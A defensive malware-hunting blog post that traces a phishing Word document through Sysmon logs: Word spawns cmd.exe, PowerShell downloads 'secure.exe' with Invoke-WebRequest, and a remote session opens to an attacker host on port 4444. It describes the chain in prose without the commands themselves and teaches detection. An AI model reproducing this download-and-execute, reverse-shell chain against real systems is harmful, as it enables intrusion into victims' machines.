In our first malware hunting blog we looked at an incident where a user had downloaded a malicious application from a website. Here we are going to investigate a malicious document which was received via email. This is our second basic investigation , but we will continue to ramp things up over the coming months.
Modern antivirus, despite being very good at identifying and blocking known threats, it can still be easily bypassed by unknown exploits (zero days) and malicious MS Office document macros. It can also have issues like any other software preventing it from working correctly which is why you need an effective logging solution that allows investigations to identify instances where malware has circumvented any protection in place.
This blog will use techniques we taught during our “Creating a Cyber Attack” series, so if you want to follow along and install a backdoor to hunt you can use the same malicious exe and website from that exercise. The first blog is here; https://blog.2code-monte.co.uk/2020/09/26/making-a-malicious-word-document-part-1-dde-vulnerability-feature/
In our scenario and end user has been duped into opening a malicious document. We have received some unusual traffic alerts on the firewall from this asset, so we connect to take a look. Let’s jump in.
Although we don’t know it yet, the user received the below document
which when opened started a malicious script which started a remote connection back to the attacker providing full access to the asset. This process is shown in the series of images below.
Once the victim has clicked yes in the document, the attacker sees the connection in their terminal.
We obviously do not have this information yet, but luckily we have sysmon configured as covered in the previous blogs so let’s see what we can find.
We know the user works in Finance, we know when we first saw alerts in the firewall, and we also know that the number one attack vector for end users is phishing emails. Speak to the user, do they remember opening an attachment which crashed, or received any unusual emails, or pop ups when browsing the internet. All and any info the user can provide could be important.
We decide to look for unusual activity relating to Office programs as a start. Now obviously we can just run netstat and look for unusual connections, but we are concentrating on sysmon here.
We find a Word doc being opened by WINWORD.EXE but nothing odd yet
However this next log looks suspicious as we have what appears to be WINWORD.EXE (ParentImage) opening cmd.exe (Image), and the parent commandline seems to be the word doc we saw earlier.
Now we have cmd.exe launching powershell, which then runs an “Invoke-WebRequest” commandline which is used to download files. Here it creates a file named “secure.exe”
We now have powershell launching another powershell instance which instructs the session to wait for 10 seconds.
Next we see powershell making an outbound connection to the same website mentioned in the above logs
And finally here we see confirmation of the malicious remote session connecting to “legitimate.website.com” on port 4444, with the Process ID of 4048.
If we refer back to Task Manager we can see that this matches the malicious exe.
Again this is a basic technique, but it will help you to understand the types of things you should be looking for. In future blogs we will go on to look at obfuscated commands and how we decode them to get the information we need.